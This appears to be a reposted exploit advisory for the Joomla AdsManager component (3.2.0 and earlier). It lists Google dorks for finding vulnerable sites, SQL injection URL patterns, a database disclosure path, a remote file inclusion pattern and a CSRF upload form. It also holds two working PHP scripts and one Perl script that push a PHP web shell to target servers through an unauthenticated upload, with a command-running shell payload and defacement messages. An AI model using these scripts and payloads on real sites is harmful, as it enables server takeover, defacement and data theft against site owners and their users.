Joomla AdsManager 3.2.0 CSRF Database Disclosure SQL Injection

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 457

######################################################################################################

# Exploit Title : Joomla AdsManager Components 3.2.0 CSRF / RFI / Backdoor Access / SQ ######################################################################################################

# Exploit Title : Joomla AdsManager Components 3.2.0 CSRF / RFI / Backdoor Access / SQL Injection / Database Disclosure
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/02/2019
# Vendor Homepage : joomprod.com ~ juloa.com
# Software Download Link : joomprod.com/download.html
github.com/amet17/webstar/tree/master/www/administrator/components/com_adsmanager/
# Software Information Link : extensions.joomla.org/extension/adsmanager/
# Software Affected Version : 1.0 ~ 2.5 ~ 2.6 ~ 2.9.13 ~ 3.1.0 - 3.2.0
and all previous versions may vulnerable.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Low / Medium
# Google Dorks : inurl:"/index.php?option=com_adsmanager"
intext:''Productos Software powered by Juloa.com''
intext:''Classifield Ads by AdsManager''
intext:''Designed by Ricky Browne T/as Redesigner.''
intext:''Designed by JoomlArt.com.''
intext:''Joomla Templates Club"
intext:''Aspetto grafico del sito curato da Gianni Marruccella''
intext:''Joomla 1.6 Template by sinci''
intext:''2019 Scuola Windsurf Salerno''
intext:''Powered by Joomla!. valid XHTML and CSS.''
intext:''Copyright (c) 2015 Morningdew Farms. All Rights Reserved."
intext:''Site mis en ligne par NET'MOTIV''
intext:''Copyright (c) 2016 NWPCS - Ontwerp en realisatie: Foppenreclame BV Harderwijk''
intext:''Powered by Fabio Panna Joomla template by SiteGround''
intext:''La Centrale des Annonces est editee par la Sarl Quartz''
More on Google and other Search Engines ......
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

######################################################################################################

# Description about Software :
***************************
AdsManager is the leading classified ads component for Joomla!

Real Estate, Cars, Pets, Electronics, Furniture, etc .....

whatever your classified project is, AdsManager can be configured to fit many needs.

AdsManager provides plenty of options, flexible views and extensions to help you to build your website.

######################################################################################################

# Impact and Consequences :
**************************

* Joomla AdsManager is prone to CSRF - RFI - File Upload and SQL Injection vulnerabilities.

* Joomla AdsManager Components 3.2.0 and other previous versions - component for Joomla is prone to an SQL-injection

vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit

latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application

and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability

may result in unauthorized data manipulation. An attacker can exploit this issue using a browser.

* This Software indicates an attack attempt to perform an Arbitrary File Upload/Shell Upload vulnerability in Joomla Component AdsManager.

The vulnerability is due to a design flaw in the vulnerable application when handling a file upload

request without authentication. A remote attacker may be able to exploit this to execute arbitrary code within

the context of the application, by uploading an arbitrary file without any authentication.

System Compromise: Remote attackers can gain control of vulnerable systems.

* This software is prone to a cross-site request-forgery vulnerability due to insufficient CSRF protection.

An attacker can exploit this issue to perform certain unauthorized actions and gain access to the affected application.

Other attacks are also possible. The web application does not, or can not, sufficiently verify whether a

well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

* This Software and its component AdsManager is prone to a remote file-include vulnerability

because it fails to sufficiently sanitize user-supplied input. Exploiting this issue may allow an attacker

to compromise the application and the underlying system; other attacks are also possible.

######################################################################################################

# PHP - PERL - Cross Site Request Forgery - Remote File Inclusion / File Upload / Shell Upload - SQL Injection Exploits :
*********************************************************************************************************
######################################################################################################

# SQL Injection Exploit =>
**************************
/index.php?option=com_adsmanager&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=write_ad&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_all&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_user&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_rules&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_profile&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_ad&adid=[ID-NUMBER]&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&catid=[ID-NUMBER]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]

/index.php?option=com_adsmanager&view=details&id=[ID-NUMBER]&ad_tier=[ID-NUMBER]&catid=[SQL Injection]

/index.php?option=com_adsmanager&view=list&format=feed&catid=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php/component/option,com_adsmanager/page,show_category/catid,1/order,0/limit,20/limitstart,0/expand,0/Itemid,30/ => [ SQL Error ]

/index.php?option=com_adsmanager&page=show_category&catid=[ID-NUMBER]&text_search=&order=[ID-NUMBER]&expand=[ID-NUMBER]&Itemid=[SQL Injection]

/index.php?option=com_adsmanager&page=show_user&userid=[ID-NUMBER]&order=[ID-NUMBER]&expand=[ID-NUMBER]&order=[ID-NUMBER]&Itemid=[SQL Injection]

######################################################################################################

# Database Disclosure Exploit =>
*******************************
/administrator/components/com_adsmanager/install.sql

######################################################################################################

Example Vulnerability Errors =>
****************************

Direct Access Exploit =>
***********************
/index.php?option=com_adsmanager&task=upload&tmpl=component

/index.php?option=com_adsmanager&task=upload&tmpl=component&Itemid=[ID-NUMBER]

# Example Vulnerability Errors :
*****************************
{"jsonrpc" : "2.0", "result" : null, "id" : "id"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_95"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_100"}

{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_4206"}

Shell Uploaded =>
*******************
{"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "SHELLNAMEHERE-CYBERIZM.php"}

# Directory File Path :
*******************

/tmp/plupload/[SHELLNAMEHERE-CYBERIZM.php]

Another Direct Access Exploit =>
*****************************
/index.php?option=com_adsmanager&page=write_ad&catid=3&Itemid=1

/index.php?option=com_adsmanager&page=write_ad&catid=[ID-NUMBER-MAY-DIFFERENT]&Itemid=[ID-NUMBER-MAY-DIFFERENT]

/index.php?option=com_adsmanager&Itemid=694&task=write&catid=71

/index.php?option=com_adsmanager&Itemid=[ID-NUMBER-MAY-DIFFERENT]&task=write&catid=[ID-NUMBER-MAY-DIFFERENT]

Check the Page =>
***************
/index.php?option=com_adsmanager&page=show_all&Itemid=1

# Directory File Path :
*******************
/images/com_adsmanager/ads/[RANDOMNUMBERS-ALPHABET].jpg .gif .png .php;.gif

######################################################################################################

# PHP Exploiter Code [ Proof of Concept PoC ] =>
**********************************************
<?php
$url = "www.[VULNERABLESITEHERE].gov/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@SHELLNAMEHERE-CYBERIZM.jpg",
"name" => "SHELLNAMEHERE-CYBERIZM.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>

######################################################################################################

# Another PHP Exploitation Code [ Proof of Concept PoC ] =>
*******************************************************

*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
function __plus() {
ob_flush();
flush();
}
function __request($params) {
$objcurl = curl_init();
curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/index.php?option=com_adsmanager&task=upload&tmpl=component");
curl_setopt($objcurl, CURLOPT_POST, 1);
curl_setopt($objcurl, CURLOPT_HEADER, 1);
curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
curl_setopt($objcurl, CURLOPT_POSTFIELDS, array("file" => "@SHELLNAMEHERE-CYBERIZM.jpg", "name" => "SHELLNAMEHERE-CYBERIZM.php"));
curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($objcurl, CURLOPT_FOLLOWLOCATION, 1);
$info['corpo'] = curl_exec($objcurl);
$info['server'] = curl_getinfo($objcurl);
curl_close($objcurl);
$gh = get_headers($params['cmd'], 1);
foreach ($gh as $key => $value) {
echo " [INFO][{$key}]:: {$value} ";
}
$_x = (strstr(($gh[0] . (isset($gh[1]) ? $gh[1] : NULL)), '200'));
echo "-------------------------------------------------------------- ";
print " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : "[-] NOT VULL ");
if (strstr($info['corpo'], '"tmpfile" : "SHELLNAMEHERE-CYBERIZM.php"')) {
print " [INFO][URL][SHELL]:: " . (!empty($_x) ? "[+] {$params['cmd']}" . file_put_contents("Exploit_ArbitraryFileUploadAdsManager_Joomla.txt", "{$params['cmd']} ", FILE_APPEND) : '[-] ERROR!');
print " [INFO] Successfully Upload! ";
}
echo "-------------------------------------------------------------- ";
}
echo " [+] Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability By Cyberizm Digital Security Army ";
$params = array('cmd' => "{$argv[1]}/tmp/plupload/SHELLNAMEHERE-CYBERIZM.php", 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit(" 0x[ERRO] DEFINE TARGET! "));
__request($params) . __plus();

######################################################################################################

# Usage of this Exploit =>
************************

# EXECUTE: php exploit.php www.VULNERABLESITE.gov
# OUTPUT: Exploit_AFU_Joomla.txt
# FILE UPLOAD: SHELLNAMEHERE-CYBERIZM.jpg => code shell: <?php system('id'); ?>

# Directory File Path : /tmp/plupload/[SHELLNAMEHERE-CYBERIZM.php]

######################################################################################################

# Another Perl Exploiter Code [ Proof of Concept PoC ] =>
***************************************************
#!/usr/bin/perl

my $ua = LWP::UserAgent->new;

system(($^O eq 'MSWin32') ? 'cls' : 'clear');

print <<logo;

CYBERIZM DIGITAL SECURITY ARMY

logo

print " [-] Joomla AdsManager File Upload/Shell Upload Exploit ";

print " Enter Target URL : ";
my $url=<>;
chomp($url);

my $exploit = "$url/index.php?option=com_adsmanager&task=upload&tmpl=component";

my $response = $ua->post( $exploit, ookie => "", Content_Type => "form-data", Content => [file => ["kingskrupellos.jpg"], name => "kingskrupellos.html"]);

$shell="$url/tmp/plupload/kingskrupellos.html";

$payload = $ua->get("$shell")->content;
if($payload =~/Hacked/)
{
print " Deface Uploaded successfully = $shell ";
}
else {
print " Target Is Not Vulnerable ";
}

print " Back To list or No(Y or N) : ";
my $let=<>;
chomp($let);
if ($let eq "y" or $let eq "Y")
{
local $CWD = '../../../..';
system "perl cyberizm.pl";
}
elsif ($let eq "n" or $let eq "N")
{
system "";
}

######################################################################################################

# Remote File Inclusion Exploit =>
******************************

/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?]

######################################################################################################

# Learn PHP Version for AdsManager Exploit =>
*******************************************
/phpinfo.php/index.php?option=com_adsmanager

Example =>

PHP Version 5.1.6
PHP Credits
Configuration
PHP Core
apache2handler
Apache Environment
HTTP Headers Information
PHP Variables
PHP License

######################################################################################################

# CSRF Cross Site Request Forgery Exploiter =>
******************************************

<form method=POST action=http://[VULNERABLESITE].gov/index.php?option=com_adsmanager&task=upload&tmpl=component
enctype=multipart/form-data>
<input type=file name=files[] /><button>Upload</button>
</form>

#####################################################################################################

# Example SQL Database Error =>
*******************************
Warning: include_once(/home/centralexf/www/administrator/components/com_comprofiler/ue_config.php)
[function.include-once]: failed to open stream: No such file or directory in /home/centralexf
/www/components/com_adsmanager/views/edit/tmpl/default.php on line 275

######################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

######################################################################################################